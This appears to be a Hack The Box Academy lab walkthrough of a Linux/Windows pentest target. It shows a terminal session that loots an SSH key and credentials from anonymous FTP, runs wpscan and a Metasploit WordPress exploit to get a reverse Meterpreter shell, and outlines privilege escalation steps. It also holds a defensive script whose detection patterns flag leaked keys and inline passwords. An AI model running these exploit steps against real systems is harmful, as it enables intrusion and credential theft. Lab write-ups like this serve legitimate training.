Medium · Academy Module · Linux + Windows · 10.129.233.210 · cube-case.htb
$ pentest_in_a_nutshell()
A full 24-section pentest engagement against a dual Linux/Windows target (cube-case.htb). Anonymous FTP exposes an SSH private key and bash history revealing credentials. WordPress on port 443 is exploited via Metasploit. Linux privilege escalation uses Dirty Pipe or SUID abuse. The Windows host runs Gitea with a Git Hooks RCE (2020-10-07) and a scheduled backup task vulnerable to code injection.
[24 sections·45 questions·13 modules]
Techniques
Anonymous FTP Loot
SSH Private Key Theft
WordPress RCE (wp_hash_form_rce)
Kernel Exploit (Dirty Pipe CVE-2022-0847)
SUID Binary Abuse
Gitea Git Hooks RCE
WinPEAS Enumeration
Scheduled Task Abuse
PowerShell Script Injection
Open Ports
Port       Service    Version
21/tcp     ftp        ProFTPD (Debian)
22/tcp     ssh        OpenSSH 8.9p1 Ubuntu
80/tcp     http       nginx 1.18.0 (Ubuntu)
443/tcp    https      Apache httpd 2.4.52 — WordPress 6.7.2
8000/tcp   ssl/http   Velociraptor (Go)
8001/tcp   ssl        Velociraptor
8080/tcp   http       Apache httpd 2.4.52 (Ubuntu)
8889/tcp   ssl        Velociraptor
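
A defender-side check for the exposure this engagement starts from: an anonymous FTP root that serves an SSH private key and a shell history containing credentials. This is an added example, not part of the original module or write-up; the function names, the rule set and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# PEM/OpenSSH private key header, e.g. "-----BEGIN OPENSSH PRIVATE KEY-----"
KEY_HEADER = re.compile(rb"-----BEGIN (?:[A-Z0-9]+ )*PRIVATE KEY-----")
# Shell history lines that embed a secret on the command line.
HISTORY_RULES = {
    "password piped to chpasswd": re.compile(r"\S+:\S+.*\|\s*(?:sudo\s+)?chpasswd\b"),
    "sshpass with inline password": re.compile(r"\bsshpass\s+-p\s*\S+"),
}

def audit_ftp_root(root):
    """Return sorted (relative_path, finding) pairs for files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1 << 20)  # first 1 MiB covers both checks
            except OSError:
                findings.append((rel, "unreadable, review manually"))
                continue
            if KEY_HEADER.search(data):
                findings.append((rel, "private key material"))
            if name.endswith("_history"):
                for line in data.decode("utf-8", "replace").splitlines():
                    for label, rule in HISTORY_RULES.items():
                        if rule.search(line):
                            findings.append((rel, label))
    return sorted(set(findings))

def build_sample_root(root):  # constructed sample tree, every value is made up
    os.makedirs(os.path.join(root, ".ssh"))
    samples = {
        "setup_notes.txt": "Blog setup notes, nothing sensitive.\n",
        ".bash_history": 'ls -la\necho "alice:Example-Pass-1" | sudo chpasswd\n',
        ".ssh/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nAAAA(constructed)\n",
    }
    for rel, text in samples.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(text)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_root(tmp)
        print(audit_ftp_root(tmp))
```

Run it against the directory the FTP daemon exposes to anonymous users; any finding means the file should be removed from the share and the key or password rotated.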
Terminal Session
htb-ac-2145354@htb ~ cube-case.htb
┌─[us-academy-4]─[10.10.14.137]─[htb-ac-2145354@htb-orflkwmdyo]─[~]
└──╼ [★]$ nmap 10.129.233.210
# 8 TCP ports open:
# 21/ftp 22/ssh 80/http 443/https
# 8000/Velociraptor 8001/ssl 8080/http 8889/ssl
# FTP anonymous login → loot files
ftp 10.129.233.210 21
> anonymous login → wordpress_Blog_Setup_Update.txt + .bash_history + .ssh/id_rsa
> cat .bash_history
> echo "john:SuperSecurePass123" | sudo chpasswd ← credentials in history!
# WordPress scan
wpscan -e --url https://10.129.233.210 --disable-tls-checks
# WordPress 6.7.2 · Theme: twentytwentyfive
# Metasploit → wp_hash_form_rce
msfconsole
use exploit/multi/http/wp_hash_form_rce
set rhosts 10.129.233.210 / rport 443 / ssl true / lhost 10.10.14.137
exploit
# Meterpreter shell as www-data (uid=33)
# Linux enum: hostname=ubuntu, kernel=5.15.0, OS=Ubuntu 22.04 (jammy)
# CVE-2022-0847 (DirtyPipe) available
# SUID binaries: 55 found via linpill.sh
# LXC container tool: /snap/bin/lxc
# Root flag
cat /root/flag.txt
# HTB{kXjCFCRfXDHN3EcJ3kAq2Wu4ZWdJ3jeQpnJWMLwGBi}
# Windows target (WIN01) enumeration
# Gitea 1.12.4 · 4 shares (non-standard: Devs)
# FileServer01 discovered in PowerShell script
# CorpBackupAgent scheduled task — runs every 2 min
# 5 hotfixes · WinPEAS: 10.0.17763 N/A Build 17763
# john SID: S-1-5-21-481531802-3248398329-2133938904-1002
# Gitea Git Hooks RCE → CVE disclosed 2020-10-07
# healthcheck.log first line: "Backup Prep Completed."
# backupprep.ps1 measures: cpu usage
# Escalation via: code injection
[✓] Full pentest completed — Linux + Windows flags captured!
Questions by Section (45 total)
1. How many TCP ports in total are open on the target?
2. What service version is running on TCP port 80? (Format: service x.y.z)
3. What is the commonName that the SSL certificate provides? (Format: example.com)